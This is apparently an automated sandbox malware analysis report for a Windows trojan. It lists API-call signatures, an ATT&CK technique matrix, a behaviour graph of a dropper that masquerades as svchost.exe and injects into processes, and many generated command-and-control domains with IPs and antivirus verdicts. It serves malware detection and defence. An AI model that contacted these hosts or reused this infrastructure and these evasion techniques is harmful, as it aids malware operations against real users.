Source: nFjEHtbDTFjy.exe, 00000022.00000002.1732800865.0000000002D80000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 00000022.00000002.1733188359.0000000002F20000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 00000022.00000002.1733188359.0000000002F20000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 00000024.00000002.1734272872.00000000028F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 00000024.00000002.1734272872.00000000028F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 00000024.00000002.1733713050.0000000000C90000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 00000024.00000002.1733713050.0000000000C90000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 00000026.00000002.1740627207.0000000002560000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 00000026.00000002.1740627207.0000000002560000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 00000026.00000002.1741539824.00000000027F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 00000026.00000002.1741539824.00000000027F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,2_2_02BC9E40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BE1250 htons,socket,setsockopt,closesocket,bind,listen,2_2_02BE1250
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BE0480 setsockopt,htons,socket,setsockopt,bind,2_2_02BE0480
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006C1250 htons,socket,setsockopt,closesocket,bind,listen,5_2_006C1250
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006C0480 setsockopt,htons,socket,setsockopt,bind,5_2_006C0480
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006A9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,5_2_006A9E40
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_01501250 htons,socket,setsockopt,closesocket,bind,listen,6_2_01501250
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_01500480 setsockopt,htons,socket,setsockopt,bind,6_2_01500480
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014E9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,6_2_014E9E40
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Valid Accounts
2
Native API
1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
1
Disable or Modify Tools
111
Input Capture
2
System Time Discovery
1
Remote Desktop Protocol
1
Archive Collected Data
4
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter
1
Create Account
1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
LSASS Memory1
Account Discovery
Remote Desktop Protocol1
Screen Capture
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Scheduled Task/Job
1
Valid Accounts
1
Valid Accounts
1
Obfuscated Files or Information
Security Account Manager1
System Network Connections Discovery
SMB/Windows Admin Shares111
Input Capture
11
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron1
Scheduled Task/Job
11
Access Token Manipulation
31
Software Packing
NTDS2
File and Directory Discovery
Distributed Component Object Model2
Clipboard Data
1
Remote Access Software
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchd1
Registry Run Keys / Startup Folder
613
Process Injection
1
DLL Side-Loading
LSA Secrets43
System Information Discovery
SSHKeylogging3
Non-Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
Bootkit
1
Scheduled Task/Job
322
Masquerading
Cached Domain Credentials1
Query Registry
VNCGUI Input Capture14
Application Layer Protocol
Data Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
Registry Run Keys / Startup Folder
1
Valid Accounts
DCSync351
Security Software Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
Virtualization/Sandbox Evasion
Proc Filesystem151
Virtualization/Sandbox Evasion
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
Access Token Manipulation
/etc/passwd and /etc/shadow13
Process Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron613
Process Injection
Network Sniffing11
Application Window Discovery
Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
Bootkit
Input Capture1
System Owner/User Discovery
Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1507240 Sample: OjKmJJm2YT.exe Startdate: 08/09/2024 Architecture: WINDOWS Score: 100 48 www.sedoparking.com 2->48 50 vowyzuf.com 2->50 52 1007 other IPs or domains 2->52 68 Suricata IDS alerts for network traffic 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 Antivirus detection for URL or domain 2->72 74 17 other signatures 2->74 9 OjKmJJm2YT.exe 2 3 2->9         started        signatures3 process4 file5 36 C:\Windows\apppatch\svchost.exe, PE32 9->36 dropped 38 C:\Windows\...\svchost.exe:Zone.Identifier, ASCII 9->38 dropped 76 Detected unpacking (changes PE section rights) 9->76 78 Detected unpacking (overwrites its own PE header) 9->78 80 Moves itself to temp directory 9->80 82 6 other signatures 9->82 13 svchost.exe 1 83 9->13         started        signatures6 process7 dnsIp8 56 vocymut.com 13->56 58 pumyliq.com 13->58 60 26 other IPs or domains 13->60 84 Antivirus detection for dropped file 13->84 86 System process connects to network (likely due to code injection or exploit) 13->86 88 Detected unpacking (changes PE section rights) 13->88 90 16 other signatures 13->90 17 nFjEHtbDTFjy.exe 13->17 injected 20 nFjEHtbDTFjy.exe 13->20 injected 22 nFjEHtbDTFjy.exe 13->22 injected 24 12 other processes 13->24 signatures9 process10 signatures11 62 Monitors registry run keys for changes 17->62 64 Contains VNC / remote desktop functionality (version string found) 17->64 66 Found direct / indirect Syscall (likely to bypass EDR) 17->66 26 WerFault.exe 24->26         started        30 WerFault.exe 21 24->30         started        32 WerFault.exe 24->32         started        34 WerFault.exe 24->34         started        process12 dnsIp13 54 lysysod.com 26->54 40 C:\ProgramData\Microsoft\...\Report.wer, Unicode 26->40 dropped 42 C:\ProgramData\Microsoft\...\Report.wer, Unicode 30->42 dropped 44 C:\ProgramData\Microsoft\...\Report.wer, Unicode 32->44 dropped 46 C:\ProgramData\Microsoft\...\Report.wer, Unicode 34->46 dropped file14

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
OjKmJJm2YT.exe100%AviraTR/Crypt.XPACK.Gen
OjKmJJm2YT.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Windows\apppatch\svchost.exe100%AviraTR/Crypt.XPACK.Gen
C:\Windows\apppatch\svchost.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://gatyviw.com/login.php0%Avira URL Cloudsafe
http://vofybic.com/login.php0%Avira URL Cloudsafe
http://pupymol.com/login.php0%Avira URL Cloudsafe
http://purymuq.com/login.php0%Avira URL Cloudsafe
http://vojygut.com/http://gahyfyz.com/http://vopycom.com/http://lyvywed.com/http://vopycom.com/http:100%Avira URL Cloudphishing
http://vojyzyt.com/login.php0%Avira URL Cloudsafe
http://vopycom.com/login.php100%Avira URL Cloudmalware
http://qekyqoq.com/login.php0%Avira URL Cloudsafe
http://volyjym.com/login.php0%Avira URL Cloudsafe
http://qekynog.com/login.php0%Avira URL Cloudsafe
http://qegyryq.com/login.php100%Avira URL Cloudmalware
http://vocyjet.com/login.php0%Avira URL Cloudsafe
http://vojyjyc.com/login.php100%Avira URL Cloudphishing
http://lykyfud.com/login.php0%Avira URL Cloudsafe
http://qegyvuq.com/login.php0%Avira URL Cloudsafe
http://galyvuz.com/login.php100%Avira URL Cloudmalware
http://lyryxen.com/login.php0%Avira URL Cloudsafe
http://gadycew.com/login.php0%Avira URL Cloudsafe
http://vowyrif.com/login.php0%Avira URL Cloudsafe
http://pumyjig.com/login.php100%Avira URL Cloudmalware
http://vopyret.com/login.php100%Avira URL Cloudphishing
http://lyvywed.com/http://gadyveb.com/http://lygyfex.com/http://gadyveb.com/100%Avira URL Cloudmalware
http://vofypuk.com/p100%Avira URL Cloudmalware
http://gahydos.com/H0%Avira URL Cloudsafe
http://lygyxun.com/login.php100%Avira URL Cloudmalware
http://gadykos.com/login.php0%Avira URL Cloudsafe
http://lyvymej.com/login.php100%Avira URL Cloudphishing
http://qebyqeq.com/login.php0%Avira URL Cloudsafe
http://vojygok.com/login.php100%Avira URL Cloudphishing
http://qekyvup.com/login.php100%Avira URL Cloudmalware
http://galydyw.com/login.php0%Avira URL Cloudsafe
http://lymyner.com/login.php0%Avira URL Cloudsafe
http://gadypuw.com/http://gadypuw.com/http://lymyjon.com/0%Avira URL Cloudsafe
http://lygyfex.com/http://lyvywed.com/http://lygyfex.com/H0%Avira URL Cloudsafe
http://gacyhez.com/login.php0%Avira URL Cloudsafe
http://vojyduf.com/login.php0%Avira URL Cloudsafe
http://pujyteq.com/login.php0%Avira URL Cloudsafe
http://ganydeh.com/login.php100%Avira URL Cloudmalware
http://lysytoj.com/login.php0%Avira URL Cloudsafe
http://pupycuv.com/login.php0%Avira URL Cloudsafe
http://lyryjir.com/login.php0%Avira URL Cloudsafe
http://qetykyq.com/login.php100%Avira URL Cloudphishing
http://vofypam.com/login.php100%Avira URL Cloudphishing
http://qetyvil.com/login.php100%Avira URL Cloudmalware
http://gatykyh.com/login.php100%Avira URL Cloudmalware
http://qetynev.com/login.php100%Avira URL Cloudphishing
http://vocyrom.com/http://gahyhys.com/http://gahyhys.com/http://qegyhev.com/http://purycul.com/http:100%Avira URL Cloudmalware
http://lyxygur.com/login.php0%Avira URL Cloudsafe
http://qegyval.com/login.php100%Avira URL Cloudmalware
http://puzybil.com/login.php0%Avira URL Cloudsafe
http://gacycaz.com/login.php100%Avira URL Cloudphishing
http://lyvymir.com/login.php100%Avira URL Cloudmalware
http://vojybim.com/login.php0%Avira URL Cloudsafe
http://gaqyres.com/login.php0%Avira URL Cloudsafe
http://lykyfax.com/http://lykyfax.com/http://pupypil.com/http://qedyxuq.com/http://qedyxuq.com/Xvj0%Avira URL Cloudsafe
http://ganykaz.com/login.php100%Avira URL Cloudmalware
http://lygyvuj.com/login.php100%Avira URL Cloudphishing
http://qeqyxyp.com/login.php100%Avira URL Cloudphishing
http://qegyfyp.com/login.php100%Avira URL Cloudmalware
http://qeqykog.com/login.php0%Avira URL Cloudsafe
http://lyxygax.com/login.php0%Avira URL Cloudsafe
http://ganypeb.com/login.phpc100%Avira URL Cloudmalware
http://qedykiv.com/login.php0%Avira URL Cloudsafe
http://ww16.vofycot.com/login.php?sub1=20240908-1853-34e6-b36e-a2256d9e0a9ehttp://ww16.vofycot.com/l100%Avira URL Cloudmalware
http://lyxyxox.com/login.php100%Avira URL Cloudphishing
http://qekyvav.com/login.php100%Avira URL Cloudmalware
http://lymywaj.com/login.php100%Avira URL Cloudmalware
http://puvydov.com/login.php0%Avira URL Cloudsafe
http://lysyfyj.com/login.php100%Avira URL Cloudmalware
http://gahyqub.com/login.php0%Avira URL Cloudsafe
http://volyquk.com/login.php0%Avira URL Cloudsafe
http://qekyqop.com/login.php0%Avira URL Cloudsafe
http://lymyxex.com/login.php0%Avira URL Cloudsafe
http://pupywog.com/login.php0%Avira URL Cloudsafe
http://gahydos.com/k/LMEM0%Avira URL Cloudsafe
http://gacynuz.com/login.php100%Avira URL Cloudmalware
http://puzyxip.com/login.php0%Avira URL Cloudsafe
http://gahyvuh.com/login.php0%Avira URL Cloudsafe
http://qetynup.com/H0%Avira URL Cloudsafe
http://puzyduq.com/login.php100%Avira URL Cloudmalware
http://pumybuq.com/0%Avira URL Cloudsafe
http://puzydal.com/login.php100%Avira URL Cloudmalware
http://gahyzez.com/login.php0%Avira URL Cloudsafe
http://galyvas.com/login.php0%Avira URL Cloudsafe
https://qegyhig.com/wp-json/100%Avira URL Cloudmalware
http://puryxag.com/login.php0%Avira URL Cloudsafe
http://volyzic.com/login.php0%Avira URL Cloudsafe
http://gatyfus.com/login.php100%Avira URL Cloudmalware
http://vojycec.com/login.php100%Avira URL Cloudphishing
http://lyxyfar.com/p100%Avira URL Cloudmalware
http://lyrytun.com/login.php0%Avira URL Cloudsafe
http://lyvyjox.com/login.php0%Avira URL Cloudsafe
http://qegytyv.com/login.php0%Avira URL Cloudsafe
http://gahypus.com/login.phpcom/login.php100%Avira URL Cloudmalware
http://volydot.com/login.php100%Avira URL Cloudphishing
http://lykyvod.com/login.php0%Avira URL Cloudsafe
http://pujydap.com/login.php100%Avira URL Cloudmalware
http://pujydap.com/http://ganykah.com/http://volygyt.com/http://pupyxuq.com/http://pupyxuq.com/100%Avira URL Cloudmalware
http://puzywel.com/100%Avira URL Cloudmalware
http://gadyneh.com/login.php0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
pupydeq.com
13.248.169.48
truetrue
    unknown
    pupycag.com
    18.208.156.248
    truetrue
      unknown
      lyvyxor.com
      208.100.26.245
      truetrue
        unknown
        77026.bodis.com
        199.59.243.226
        truetrue
          unknown
          lysyvan.com
          188.114.96.3
          truetrue
            unknown
            galynuh.com
            64.225.91.73
            truetrue
              unknown
              parkingpage.namecheap.com
              91.195.240.19
              truetrue
                unknown
                qegyhig.com
                188.114.96.3
                truetrue
                  unknown
                  gatyfus.com
                  5.79.71.225
                  truetrue
                    unknown
                    vonypom.com
                    18.208.156.248
                    truetrue
                      unknown
                      puzylyp.com
                      3.64.163.50
                      truetrue
                        unknown
                        qexyhuv.com
                        15.197.240.20
                        truetrue
                          unknown
                          pltraffic7.com
                          72.52.179.174
                          truetrue
                            unknown
                            gadyciz.com
                            44.221.84.105
                            truetrue
                              unknown
                              gadyniw.com
                              154.212.231.82
                              truetrue
                                unknown
                                lyxynyx.com
                                103.224.212.108
                                truetrue
                                  unknown
                                  www.sedoparking.com
                                  64.190.63.136
                                  truetrue
                                    unknown
                                    lygyvuj.com
                                    52.34.198.229
                                    truetrue
                                      unknown
                                      gahyqah.com
                                      162.255.119.102
                                      truetrue
                                        unknown
                                        vocyzit.com
                                        44.221.84.105
                                        truetrue
                                          unknown
                                          galyqaz.com
                                          199.191.50.83
                                          truetrue
                                            unknown
                                            vofycot.com
                                            103.224.182.252
                                            truetrue
                                              unknown
                                              qetyhyg.com
                                              64.225.91.73
                                              truetrue
                                                unknown
                                                vojyqem.com
                                                3.64.163.50
                                                truetrue
                                                  unknown
                                                  gahyhiz.com
                                                  44.221.84.105
                                                  truetrue
                                                    unknown
                                                    qetyfuv.com
                                                    44.221.84.105
                                                    truetrue
                                                      unknown
                                                      lysyfyj.com
                                                      69.162.80.55
                                                      truetrue
                                                        unknown
                                                        gtm-sg-6l13ukk0m05.qu200.com
                                                        103.150.11.230
                                                        truetrue
                                                          unknown
                                                          lymyxid.com
                                                          3.94.10.34
                                                          truetrue
                                                            unknown
                                                            qegyval.com
                                                            154.85.183.50
                                                            truetrue
                                                              unknown
                                                              gatyzoz.com
                                                              unknown
                                                              unknowntrue
                                                                unknown
                                                                lykygaj.com
                                                                unknown
                                                                unknowntrue
                                                                  unknown
                                                                  qedyxel.com
                                                                  unknown
                                                                  unknowntrue
                                                                    unknown
                                                                    qedyqup.com
                                                                    unknown
                                                                    unknowntrue
                                                                      unknown
                                                                      qekyluv.com
                                                                      unknown
                                                                      unknowntrue
                                                                        unknown
                                                                        gatyrez.com
                                                                        unknown
                                                                        unknowntrue
                                                                          unknown
                                                                          vofybic.com
                                                                          unknown
                                                                          unknowntrue
                                                                            unknown
                                                                            pujydag.com
                                                                            unknown
                                                                            unknowntrue
                                                                              unknown
                                                                              vojykom.com
                                                                              unknown
                                                                              unknowntrue
                                                                                unknown
                                                                                qetysuq.com
                                                                                unknown
                                                                                unknowntrue
                                                                                  unknown
                                                                                  vonyzut.com
                                                                                  unknown
                                                                                  unknowntrue
                                                                                    unknown
                                                                                    pufyjuq.com
                                                                                    unknown
                                                                                    unknowntrue
                                                                                      unknown
                                                                                      pujytug.com
                                                                                      unknown
                                                                                      unknowntrue
                                                                                        unknown
                                                                                        galyhiw.com
                                                                                        unknown
                                                                                        unknowntrue
                                                                                          unknown
                                                                                          lykygun.com
                                                                                          unknown
                                                                                          unknowntrue
                                                                                            unknown
                                                                                            vopymyc.com
                                                                                            unknown
                                                                                            unknowntrue
                                                                                              unknown
                                                                                              gatyfaz.com
                                                                                              unknown
                                                                                              unknowntrue
                                                                                                unknown
                                                                                                vojycit.com
                                                                                                unknown
                                                                                                unknowntrue
                                                                                                  unknown
                                                                                                  lyvymej.com
                                                                                                  unknown
                                                                                                  unknowntrue
                                                                                                    unknown
                                                                                                    lygyvar.com
                                                                                                    unknown
                                                                                                    unknowntrue
                                                                                                      unknown
                                                                                                      purygiv.com
                                                                                                      unknown
                                                                                                      unknowntrue
                                                                                                        unknown
                                                                                                        gahykeb.com
                                                                                                        unknown
                                                                                                        unknowntrue
                                                                                                          unknown
                                                                                                          purymog.com
                                                                                                          unknown
                                                                                                          unknowntrue
                                                                                                            unknown
                                                                                                            gadyzib.com
                                                                                                            unknown
                                                                                                            unknowntrue
                                                                                                              unknown
                                                                                                              ganyqow.com
                                                                                                              unknown
                                                                                                              unknowntrue
                                                                                                                unknown
                                                                                                                lyxysun.com
                                                                                                                unknown
                                                                                                                unknowntrue
                                                                                                                  unknown
                                                                                                                  puzyjyg.com
                                                                                                                  unknown
                                                                                                                  unknowntrue
                                                                                                                    unknown
                                                                                                                    vopydek.com
                                                                                                                    unknown
                                                                                                                    unknowntrue
                                                                                                                      unknown
                                                                                                                      qexyfuq.com
                                                                                                                      unknown
                                                                                                                      unknowntrue
                                                                                                                        unknown
                                                                                                                        gatykyh.com
                                                                                                                        unknown
                                                                                                                        unknowntrue
                                                                                                                          unknown
                                                                                                                          vocykem.com
                                                                                                                          unknown
                                                                                                                          unknowntrue
                                                                                                                            unknown
                                                                                                                            gahynus.com
                                                                                                                            unknown
                                                                                                                            unknowntrue
                                                                                                                              unknown
                                                                                                                              pumypop.com
                                                                                                                              unknown
                                                                                                                              unknowntrue
                                                                                                                                unknown
                                                                                                                                lyvysur.com
                                                                                                                                unknown
                                                                                                                                unknowntrue
                                                                                                                                  unknown
                                                                                                                                  puzypav.com
                                                                                                                                  unknown
                                                                                                                                  unknowntrue
                                                                                                                                    unknown
                                                                                                                                    galypob.com
                                                                                                                                    unknown
                                                                                                                                    unknowntrue
                                                                                                                                      unknown
                                                                                                                                      gacyqoz.com
                                                                                                                                      unknown
                                                                                                                                      unknowntrue
                                                                                                                                        unknown
                                                                                                                                        lykywid.com
                                                                                                                                        unknown
                                                                                                                                        unknowntrue
                                                                                                                                          unknown
                                                                                                                                          lykytin.com
                                                                                                                                          unknown
                                                                                                                                          unknowntrue
                                                                                                                                            unknown
                                                                                                                                            vofyref.com
                                                                                                                                            unknown
                                                                                                                                            unknowntrue
                                                                                                                                              unknown
                                                                                                                                              qekytig.com
                                                                                                                                              unknown
                                                                                                                                              unknowntrue
                                                                                                                                                unknown
                                                                                                                                                vocyzek.com
                                                                                                                                                unknown
                                                                                                                                                unknowntrue
                                                                                                                                                  unknown
                                                                                                                                                  puvypoq.com
                                                                                                                                                  unknown
                                                                                                                                                  unknowntrue
                                                                                                                                                    unknown
                                                                                                                                                    puvybeg.com
                                                                                                                                                    unknown
                                                                                                                                                    unknowntrue
                                                                                                                                                      unknown
                                                                                                                                                      pupydig.com
                                                                                                                                                      unknown
                                                                                                                                                      unknowntrue
                                                                                                                                                        unknown
                                                                                                                                                        pupyguq.com
                                                                                                                                                        unknown
                                                                                                                                                        unknowntrue
                                                                                                                                                          unknown
                                                                                                                                                          qedyqal.com
                                                                                                                                                          unknown
                                                                                                                                                          unknowntrue
                                                                                                                                                            unknown
                                                                                                                                                            vowymom.com
                                                                                                                                                            unknown
                                                                                                                                                            unknowntrue
                                                                                                                                                              unknown
                                                                                                                                                              purypol.com
                                                                                                                                                              unknown
                                                                                                                                                              unknowntrue
                                                                                                                                                                unknown
                                                                                                                                                                ganypeb.com
                                                                                                                                                                unknown
                                                                                                                                                                unknowntrue
                                                                                                                                                                  unknown
                                                                                                                                                                  vopymit.com
                                                                                                                                                                  unknown
                                                                                                                                                                  unknowntrue
                                                                                                                                                                    unknown
                                                                                                                                                                    vowyguf.com
                                                                                                                                                                    unknown
                                                                                                                                                                    unknowntrue
                                                                                                                                                                      unknown
                                                                                                                                                                      pupytiq.com
                                                                                                                                                                      unknown
                                                                                                                                                                      unknowntrue
                                                                                                                                                                        unknown
                                                                                                                                                                        lymyfoj.com
                                                                                                                                                                        unknown
                                                                                                                                                                        unknowntrue
                                                                                                                                                                          unknown
                                                                                                                                                                          vowyzuf.com
                                                                                                                                                                          unknown
                                                                                                                                                                          unknowntrue
                                                                                                                                                                            unknown
                                                                                                                                                                            gatyruw.com
                                                                                                                                                                            unknown
                                                                                                                                                                            unknowntrue
                                                                                                                                                                              unknown
                                                                                                                                                                              qebynyg.com
                                                                                                                                                                              unknown
                                                                                                                                                                              unknowntrue
                                                                                                                                                                                unknown
                                                                                                                                                                                puzymev.com
                                                                                                                                                                                unknown
                                                                                                                                                                                unknowntrue
                                                                                                                                                                                  unknown
                                                                                                                                                                                  pupymol.com
                                                                                                                                                                                  unknown
                                                                                                                                                                                  unknowntrue
                                                                                                                                                                                    unknown
                                                                                                                                                                                    vojycif.com
                                                                                                                                                                                    unknown
                                                                                                                                                                                    unknowntrue
                                                                                                                                                                                      unknown
                                                                                                                                                                                      qebyvyl.com
                                                                                                                                                                                      unknown
                                                                                                                                                                                      unknowntrue
                                                                                                                                                                                        unknown
                                                                                                                                                                                        lymysan.com
                                                                                                                                                                                        unknown
                                                                                                                                                                                        unknowntrue
                                                                                                                                                                                          unknown
                                                                                                                                                                                          qekynuq.com
                                                                                                                                                                                          unknown
                                                                                                                                                                                          unknowntrue
                                                                                                                                                                                            unknown
                                                                                                                                                                                            puryjil.com
                                                                                                                                                                                            unknown
                                                                                                                                                                                            unknowntrue
                                                                                                                                                                                              unknown
                                                                                                                                                                                              puvytuv.com
                                                                                                                                                                                              unknown
                                                                                                                                                                                              unknowntrue
                                                                                                                                                                                                unknown
                                                                                                                                                                                                galyzus.com
                                                                                                                                                                                                unknown
                                                                                                                                                                                                unknowntrue
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  gadyfuh.com
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  unknowntrue
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    vofycyk.com
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    unknowntrue
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      lyxywer.com
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      unknowntrue
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        vojymuk.com
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        unknowntrue
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                          http://lysyfyj.com/login.phptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                          http://pupymol.com/login.phpsvchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104551479.000000000B403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qekynog.com/login.phpsvchost.exe, 00000002.00000003.2059929995.00000000066BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071802239.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085027687.00000000066E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qekyqoq.com/login.phpsvchost.exe, 00000002.00000003.2565607044.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536917533.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619875207.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567335310.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564957391.000000000B5A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123556284.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560112405.00000000066AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vojygut.com/http://gahyfyz.com/http://vopycom.com/http://lyvywed.com/http://vopycom.com/http:svchost.exe, 00000002.00000003.1793087663.000000000662E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1790880337.000000000662C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://volyjym.com/login.phpsvchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2055822668.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmpfalse
